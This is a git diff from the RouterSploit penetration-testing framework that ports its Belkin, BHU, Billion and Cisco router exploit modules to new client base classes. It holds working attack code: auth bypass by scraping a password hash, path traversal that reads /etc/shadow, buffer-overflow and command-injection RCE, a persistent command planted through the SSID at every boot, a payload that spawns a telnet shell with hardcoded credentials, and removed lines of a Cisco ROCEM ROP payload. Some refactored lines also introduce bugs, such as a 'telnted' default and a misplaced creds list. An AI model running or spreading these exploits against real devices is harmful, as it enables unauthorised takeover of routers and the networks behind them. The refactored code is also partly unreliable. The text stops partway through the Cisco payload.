a/routersploit/modules/exploits/routers/belkin/auth_bypass.py b/routersploit/modules/exploits/routers/belkin/auth_bypass.py index 36fc8a4f6..c07e1677a 100644 --- a/routersploit/modules/exploits/routers/belkin/auth_bypass.py +++ b/routersploit/modules/exploits/routers/belkin/auth_bypass.py @@ -1,57 +1,50 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Authentication bypass using MD5 password disclosure. - If the target is vulnerable, your computer is automatically authenticated. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin Auth Bypass', - 'description': 'Module exploits Belkin authentication using MD5 password disclosure', - 'authors': [ - 'Gregory Smiley ', # vulnerability discovery - 'BigNerd95 (Lorenzo Santina)', # improved exploit and routersploit module + "name": "Belkin Auth Bypass", + "description": "Module exploits Belkin authentication using MD5 password disclosure.", + "authors": [ + "Gregory Smiley ", # vulnerability discovery + "BigNerd95 (Lorenzo Santina)", # improved exploit and routersploit module ], - 'references': [ - 'https://securityevaluators.com/knowledge/case_studies/routers/belkin_n900.php', - 'https://www.exploit-db.com/exploits/40081/', + "references": [ + "https://securityevaluators.com/knowledge/case_studies/routers/belkin_n900.php", + "https://www.exploit-db.com/exploits/40081/", ], - 'devices': [ - 'Belkin Play Max (F7D4401)', - 'Belkin F5D8633', - 'Belkin N900 (F9K1104)', - 'Belkin N300 (F7D7301)', - 'Belkin AC1200', + "devices": [ + "Belkin Play Max (F7D4401)", + "Belkin F5D8633", + "Belkin N900 (F9K1104)", + "Belkin N300 (F7D7301)", + "Belkin AC1200", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/login.stm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces if len(val): - url = "{}:{}/login.cgi".format(self.target, self.port) payload = "pws=" + val[0] + "&arc_action=login&action=Submit" - login = http_request(method="POST", url=url, data=payload) + login = self.http_request( + method="POST", + path="/login.cgi", + data=payload + ) if login is None: return @@ -65,9 +58,10 @@ def run(self): @mute def check(self): - url = "{}:{}/login.stm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/belkin/g_n150_password_disclosure.py b/routersploit/modules/exploits/routers/belkin/g_n150_password_disclosure.py index 1d60bcc78..3d522c719 100644 --- a/routersploit/modules/exploits/routers/belkin/g_n150_password_disclosure.py +++ b/routersploit/modules/exploits/routers/belkin/g_n150_password_disclosure.py @@ -1,46 +1,35 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Belkin G and N150 Password MD5 Disclosure vulnerability. - If the target is vulnerable, password in MD5 format is returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin G & N150 Password Disclosure', - 'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format', - 'authors': [ - 'Aodrulez ', # vulnerability discovery - 'Avinash Tangirala', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Belkin G & N150 Password Disclosure", + "description": "Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format", + "authors": [ + "Aodrulez ", # vulnerability discovery + "Avinash Tangirala", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765', - 'https://www.exploit-db.com/exploits/17349/', + "references": [ + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765", + "https://www.exploit-db.com/exploits/17349/", ], - 'devices': [ - 'Belkin G', - 'Belkin N150', + "devices": [ + "Belkin G", + "Belkin N150", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/login.stm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return @@ -57,9 +46,10 @@ def run(self): @mute def check(self): - url = "{}:{}/login.stm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/belkin/g_plus_info_disclosure.py b/routersploit/modules/exploits/routers/belkin/g_plus_info_disclosure.py index e05792329..823a491d3 100644 --- a/routersploit/modules/exploits/routers/belkin/g_plus_info_disclosure.py +++ b/routersploit/modules/exploits/routers/belkin/g_plus_info_disclosure.py @@ -1,45 +1,34 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability. - If the target is vulnerable, sensitive information such as credentials are returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin G Info Disclosure', - 'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure ' - 'vulnerability which allows fetching sensitive information such as credentials.', - 'authors': [ - 'DarkFig', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Belkin G Info Disclosure", + "description": "Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure " + "vulnerability which allows fetching sensitive information such as credentials.", + "authors": [ + "DarkFig", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403', - 'https://www.exploit-db.com/exploits/4941/', + "references": [ + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403", + "https://www.exploit-db.com/exploits/4941/", ], - 'devices': [ - 'Belkin G', + "devices": [ + "Belkin G", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/SaveCfgFile.cgi", + ) if response is None: return @@ -73,9 +62,10 @@ def run(self): @mute def check(self): - url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/SaveCfgFile.cgi", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/belkin/n150_path_traversal.py b/routersploit/modules/exploits/routers/belkin/n150_path_traversal.py index 8b02cbc85..a61212273 100644 --- a/routersploit/modules/exploits/routers/belkin/n150_path_traversal.py +++ b/routersploit/modules/exploits/routers/belkin/n150_path_traversal.py @@ -1,48 +1,42 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Belkin N150 Path Traversal vulnerability. - If the target is vulnerable, content of the specified file is returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin N150 Path Traversal', - 'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.', - 'authors': [ - 'Aditya Lad', # vulnerability discovery - 'Rahul Pratap Singh', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Belkin N150 Path Traversal", + "description": "Module exploits Belkin N150 Path Traversal vulnerability " + "which allows to read any file on the system.", + "authors": [ + "Aditya Lad", # vulnerability discovery + "Rahul Pratap Singh", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/38488/', - 'http://www.belkin.com/us/support-article?articleNum=109400', - 'http://www.kb.cert.org/vuls/id/774788', + "references": [ + "https://www.exploit-db.com/exploits/38488/", + "http://www.belkin.com/us/support-article?articleNum=109400", + "http://www.kb.cert.org/vuls/id/774788", ], - 'devices': [ - 'Belkin N150 1.00.07', - 'Belkin N150 1.00.08', - 'Belkin N150 1.00.09', + "devices": [ + "Belkin N150 1.00.07", + "Belkin N150 1.00.08", + "Belkin N150 1.00.09", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/shadow', 'File to read') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/shadow", "File to read from filesystem") def run(self): if self.check(): - url = "{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.target, self.port, self.filename) + path = "/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.filename) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) if response is None: return @@ -56,13 +50,12 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port) - - response = http_request(method="GET", url=url) - if response is None: - return False # target is not vulnerable + response = self.http_request( + method="GET", + path="/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo", + ) - if "root:" in response.text: + if response and utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/belkin/n750_rce.py b/routersploit/modules/exploits/routers/belkin/n750_rce.py index 5ad278f61..907071f46 100644 --- a/routersploit/modules/exploits/routers/belkin/n750_rce.py +++ b/routersploit/modules/exploits/routers/belkin/n750_rce.py @@ -1,40 +1,27 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - random_text, - http_request, - mute, - validators, - shell -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Belkin N750 Remote Code Execution vulnerability. - If the target is vulnerable, command prompt is invoked. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin N750 RCE', - 'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.', - 'authors': [ - 'Marco Vaz ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Belkin N750 RCE", + "description": "Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.", + "authors": [ + "Marco Vaz ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635', - 'https://www.exploit-db.com/exploits/35184/', - 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/', + "references": [ + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635", + "https://www.exploit-db.com/exploits/35184/", + "https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/", ], - 'devices': [ - 'Belkin N750', + "devices": [ + "Belkin N750", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -45,11 +32,15 @@ def run(self): print_error("Target is not vulnerable") def execute(self, cmd): - url = "{}:{}/login.cgi.php".format(self.target, self.port) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} + headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd) - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/login.cgi.php", + headers=headers, + data=data, + ) if response is None: return "" @@ -57,7 +48,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/belkin/play_max_prce.py b/routersploit/modules/exploits/routers/belkin/play_max_prce.py index ecf95f3e3..beb19569e 100644 --- a/routersploit/modules/exploits/routers/belkin/play_max_prce.py +++ b/routersploit/modules/exploits/routers/belkin/play_max_prce.py @@ -1,54 +1,47 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Persistent remote command execution. - If the target is vulnerable, you can run a bash command at every boot. - """ + +class Exploit(HTTPClient): __info__ = { - 'name': 'Belkin Play Max Persistent RCE', - 'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot', - 'authors': [ - 'BigNerd95 (Lorenzo Santina) https://github.com/bignerd95', # vulnerability discovery and routersploit module + "name": "Belkin Play Max Persistent RCE", + "description": "Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot.", + "authors": [ + "BigNerd95 (Lorenzo Santina) https://github.com/bignerd95", # vulnerability discovery and routersploit module ], - 'references': [ - 'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html', - 'https://gist.github.com/BigNerd95/c18658b472ac0ccf4dbbc73fe988b683' + "references": [ + "https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html", + "https://gist.github.com/BigNerd95/c18658b472ac0ccf4dbbc73fe988b683", ], - 'devices': [ - 'Belkin Play Max (F7D4401)', + "devices": [ + "Belkin Play Max (F7D4401)", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port', validators=validators.integer) - cmd = exploits.Option('telnetd', 'Command to execute') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - def auth_bypass(self): - url = "{}:{}/login.stm".format(self.target, self.port) + cmd = OptString("telnted", "Command to execute") - response = http_request(method="GET", url=url) + def auth_bypass(self): + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return False val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces if len(val): - url = "{}:{}/login.cgi".format(self.target, self.port) payload = "pws=" + val[0] + "&arc_action=login&action=Submit" - login = http_request(method="POST", url=url, data=payload) + login = self.http_request( + method="POST", + path="/login.cgi", + data=payload + ) if login is None: return False @@ -62,8 +55,10 @@ def auth_bypass(self): return False def inject_command(self): - ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port) - response = http_request(method="GET", url=ssid_url) + response = self.http_request( + method="GET", + path="/wireless_id.stm", + ) if response is None: print_error("Exploit failed. No response from target!") return @@ -83,8 +78,11 @@ def inject_command(self): newSSID = SSID + "%3B" + self.cmd + "%3B" payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid=" + newSSID + "&arc_action=Apply+Changes&wchan=1&ssid=" + newSSID - url = "{}:{}/apply.cgi".format(self.target, self.port) - response = http_request(method="POST", url=url, data=payload) + response = self.http_request( + method="POST", + path="/apply.cgi", + data=payload, + ) if response is None: print_error("Exploit failed. No response from target!") @@ -102,9 +100,10 @@ def run(self): @mute def check(self): - url = "{}:{}/login.stm".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/login.stm", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py b/routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py index 3c1ce3d8d..a24eb82c4 100644 --- a/routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py +++ b/routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py @@ -1,36 +1,25 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - validators, - shell, - mute, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - - """Exploit implementation for unauthenticated RCE vulnerability on BHU uRouter.""" - +class Exploit(HTTPClient): __info__ = { - 'name': 'BHU uRouter RCE', - 'authors': [ - 'Tao "depierre" Sauvage', + "name": "BHU uRouter RCE", + "description": "Module exploits BHU uRouter unauthenticated remote code execution vulnerability, which " + "allows executing commands on the router with root privileges.", + "authors": [ + "Tao 'depierre' Sauvage", ], - 'description': 'Module exploits BHU uRouter unauthenticated remote code execution vulnerability, which ' - 'allows executing commands on the router with root privileges.', - 'references': [ - 'http://www.ioactive.com/pdfs/BHU-WiFi_uRouter-Security_Advisory_Final081716.pdf', + "references": [ + "http://www.ioactive.com/pdfs/BHU-WiFi_uRouter-Security_Advisory_Final081716.pdf", ], - 'devices': [ - 'BHU uRouter', + "devices": [ + "BHU uRouter", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.62.1', validators=validators.url) - port = exploits.Option(80, 'Target port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -45,29 +34,44 @@ def run(self): print_error('Target is not vulnerable') def execute(self, cmd): - url = u'{}:{}/cgi-bin/cgiSrv.cgi'.format(self.target, self.port) - headers = {u'Content-Type': u'text/xml', u'X-Requested-With': u'XMLHttpRequest'} - data = u''.format(cmd) - http_request(method=u'POST', url=url, headers=headers, data=data) + headers = {'Content-Type': 'text/xml', 'X-Requested-With': 'XMLHttpRequest'} + data = ''.format(cmd) + self.http_request( + method="POST", + path="/cgi-bin/cgiSrv.cgi", + headers=headers, + data=data + ) return '' # Blind RCE so no response available @mute def check(self): - url = u'{}:{}/cgi-bin/cgiSrv.cgi'.format(self.target, self.port) - headers = {u'Content-Type': u'text/xml', u'X-Requested-With': u'XMLHttpRequest'} - data = u'' + headers = {'Content-Type': 'text/xml', 'X-Requested-With': 'XMLHttpRequest'} + data = '' # Blind unauth RCE so we first create a file in the www-root directory cmd_echo = data.format(u'echo "$USER" > /usr/share/www/routersploit.check') - response = http_request(method=u'POST', url=url, headers=headers, data=cmd_echo) + response = self.http_request( + method="POST", + path="/cgi-bin/cgiSrv.cgi", + headers=headers, + data=cmd_echo + ) if not response or u'status="doing"' not in response.text: return False # Second we check that the file was successfully created - url = u'{}:{}/routersploit.check'.format(self.target, self.port) - response = http_request(method=u'GET', url=url) + response = self.http_request( + method="GET", + path="/routersploit.check", + ) if not response.status_code == 200 or u'root' not in response.text: return False # Third we clean up the temp file. No need to check if successful since we already check that the device was # vulnerable at this point. - cmd_rm = data.format(u'rm -f /usr/share/www/routersploit.check') - http_request(method=u'POST', url=url, headers=headers, data=cmd_rm) + cmd_rm = data.format("rm -f /usr/share/www/routersploit.check") + self.http_request( + method="POST", + path="/cgi-bin/cgiSrv.cgi", + headers=headers, + data=cmd_rm + ) return True diff --git a/routersploit/modules/exploits/routers/billion/5200w_rce.py b/routersploit/modules/exploits/routers/billion/5200w_rce.py index 8de0e2db6..5c263d89a 100644 --- a/routersploit/modules/exploits/routers/billion/5200w_rce.py +++ b/routersploit/modules/exploits/routers/billion/5200w_rce.py @@ -1,52 +1,42 @@ import telnetlib +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient -from routersploit import ( - exploits, - print_status, - print_error, - http_request, - mute, - validators, - random_text, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Billion 5200W-T Remote Command Execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ + +class Exploit(TCPClient): __info__ = { - 'name': 'Billion 5200W-T RCE', - 'description': 'Module exploits Remote Command Execution vulnerability in Billion 5200W-T devices. ' - 'If the target is vulnerable it allows to execute commands on operating system level.', - 'authors': [ - 'Pedro Ribeiro ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Billion 5200W-T RCE", + "description": "Module exploits Remote Command Execution vulnerability in Billion 5200W-T devices. " + "If the target is vulnerable it allows to execute commands on operating system level.", + "authors": [ + "Pedro Ribeiro ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://seclists.org/fulldisclosure/2017/Jan/40', - 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt', - 'https://blogs.securiteam.com/index.php/archives/2910' + "references": [ + "http://seclists.org/fulldisclosure/2017/Jan/40", + "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt", + "https://blogs.securiteam.com/index.php/archives/2910", ], - 'devices': [ - 'Billion 5200W-T', + "devices": [ + "Billion 5200W-T", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port', validators=validators.integer) # default port - telnet_port = exploits.Option(9999, 'Telnet port used for exploitation', validators=validators.integer) # telnet port used for exploitation + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + telnet_port = OptPort(9999, "Telnet port used for exploitation") - username = exploits.Option('admin', 'Default username to log in') - password = exploits.Option('password', 'Default password to log in') + username = OptString("admin", "Default username to log in") + password = OptString("password", "Default password to log in") - # hardcoded credentials - creds = [ - ('admin', 'password'), - ('true', 'true'), - ('user3', '12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678') - ] + def __init__(self): + # hardcoded credentials + creds = [ + ("admin", "password"), + ("true", "true"), + ("user3", "12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678") + ] def run(self): cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnet_port) @@ -83,7 +73,7 @@ def execute2(self, cmd): # Fixate cookie url = "{}:{}/".format(self.target, self.port) cookies = { - "SESSIONID": random_text(8) + "SESSIONID": utils.random_text(8) } response = http_request(method="GET", url=url, cookies=cookies, auth=(creds[0], creds[1])) @@ -134,10 +124,10 @@ def telnet_connect(self): print_status("Trying to connect to the telnet server...") try: - tn = telnetlib.Telnet(target, self.telnet_port, timeout=10) + tn = telnetlib.Telnet(target, self.telnet_port) tn.interact() tn.close() - except Exception: + except: print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnet_port)) @mute diff --git a/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py b/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py index 49575fa76..eb5f3c010 100644 --- a/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py +++ b/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py @@ -1,50 +1,39 @@ import re import base64 +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Billion 7700NR4 Password Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for admin user." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Billion 7700NR4 Password Disclosure', - 'description': 'Exploits Billion 7700NR4 password disclosure vulnerability that allows to ' - 'fetch credentials for admin account', - 'authors': [ - 'R-73eN', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Billion 7700NR4 Password Disclosure", + "description": "Exploits Billion 7700NR4 password disclosure vulnerability that allows to " + "fetch credentials for admin account", + "authors": [ + "R-73eN", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40472/', + "references": [ + "https://www.exploit-db.com/exploits/40472/", ], - 'devices': [ - 'Billion 7700NR4', + "devices": [ + "Billion 7700NR4", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - def_user = exploits.Option('user', 'Hardcoded username') - def_pass = exploits.Option('user', 'Hardcoded password') + def_user = OptString("user", "Hardcoded username") + def_pass = OptString("user", "Hardcoded password") def run(self): creds = [] - url = "{}:{}/backupsettings.conf".format(self.target, self.port) - - response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass)) + response = self.http_request( + method="GET", + path="/backupsettings.conf", + auth=(self.def_user, self.def_pass) + ) if response is None: print_error("Exploit failed") return @@ -57,7 +46,7 @@ def run(self): try: print_status("Trying to base64 decode") password = base64.b64decode(res[0]) - except Exception: + except: print_error("Exploit failed - could not decode password") return @@ -70,9 +59,11 @@ def run(self): @mute def check(self): - url = "{}:{}/backupsettings.conf".format(self.target, self.port) - - response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass)) + response = self.http_request( + method="GET", + path="/backupsettings.conf", + auth=(self.def_user, self.def_pass), + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py index 0c419d6f8..115e27615 100644 --- a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py +++ b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py @@ -1,21 +1,10 @@ import socket import telnetlib +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient -from routersploit import ( - exploits, - print_status, - print_error, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco Catalyst 2960 IOS 12.2(55)SE11 'ROCEM' RCE vulnerability. - If target is vulnerable, it is possible to patch execution flow to allow credless telnet - interaction with highest privilege level. - """ + +class Exploit(TCPClient): __info__ = { 'name': 'Cisco Catalyst 2960 ROCEM RCE', 'description': 'Module exploits Cisco Catalyst 2960 ROCEM RCE vulnerability. ' @@ -23,7 +12,7 @@ class Exploit(exploits.Exploit): 'to allow credless telnet interaction with highest privilege level.', 'authors': [ 'Artem Kondratenko <@artkond>', # analysis & python exploit - 'Marcin Bury ' # routersploit module + 'Marcin Bury ' # routersploit module ], 'references': [ 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881', @@ -37,139 +26,140 @@ class Exploit(exploits.Exploit): ], } - target = exploits.Option('', 'Target IP address', validators=validators.ipv4) - telnet_port = exploits.Option(23, 'Target Port', validators=validators.integer) - - action = exploits.Option('set', 'set / unset credless authentication for Telnet service') - device = exploits.Option(-1, 'Target device - use "show devices"', validators=validators.integer) - - payloads = [ - # Cisco Catalyst 2960 IOS 12.2(55)SE1 - { - "template": ( - "\xff\xfa\x24\x00" + - "\x03CISCO_KITS\x012:" + - "A" * 116 + - # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; - "\x00\x00\x37\xb4" + - # next bytes are shown as offsets from r1 - # +8 address of pointer to is_cluster_mode function - 0x34 - "\x02\x2c\x8b\x74" + - "{FUNC_IS_CLUSTER_MODE}" + - # +16(+0) r1 points here at second gadget - "BBBB" + - # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; - "\x00\xdf\xfb\xe8" + - # +8 - "CCCC" + - # +12 - "DDDD" + - # +16(+0) r1 points here at third gadget - "EEEE" + - # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; - "\x00\x06\x78\x8c" + - # +8 r1+8 = 0x022c8b60 - "\x02\x2c\x8b\x60" + - # +12 - "FFFF" + - # +16(+0) r1 points here at fourth gadget - "GGGG" + - # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; - "\x00\x6b\xa1\x28" + - "{FUNC_PRIVILEGE_LEVEL}" + - # +12 - "HHHH" + - # +16(+0) r1 points here at fifth gadget - "IIII" + - # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; - "\x01\x48\xe5\x60" + - # +8 r1 points here at third gadget - "JJJJ" + - # +12 - "KKKK" + - # +16 - "LLLL" + - # +20 original execution flow return addr - "\x01\x13\x31\xa8" + - ":15:" + "\xff\xf0" - ), - "func_is_cluster_mode": { - # +12 set address of func that rets 1 - "set": "\x00\x00\x99\x80", - # unset - "unset": "\x00\x04\xea\x58" - }, - "func_privilege_level": { - # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; - "set": "\x00\x12\x52\x1c", - # unset - "unset": "\x00\x04\xe6\xf0" - } - }, - - # Cisco Catalyst 2960 IOS 12.2(55)SE11 - { - "template": ( - "\xff\xfa\x24\x00" + - "\x03CISCO_KITS\x012:" + - "A" * 116 + - # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; - "\x00\x00\x37\xb4" + - # next bytes are shown as offsets from r1 - # +8 address of pointer to is_cluster_mode function - 0x34 - "\x02\x3d\x55\xdc" + - "{FUNC_IS_CLUSTER_MODE}" + - # +16(+0) r1 points here at second gadget - "BBBB" + - # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; - "\x00\xe1\xa9\xf4" + - # +8 - "CCCC" + - # +12 - 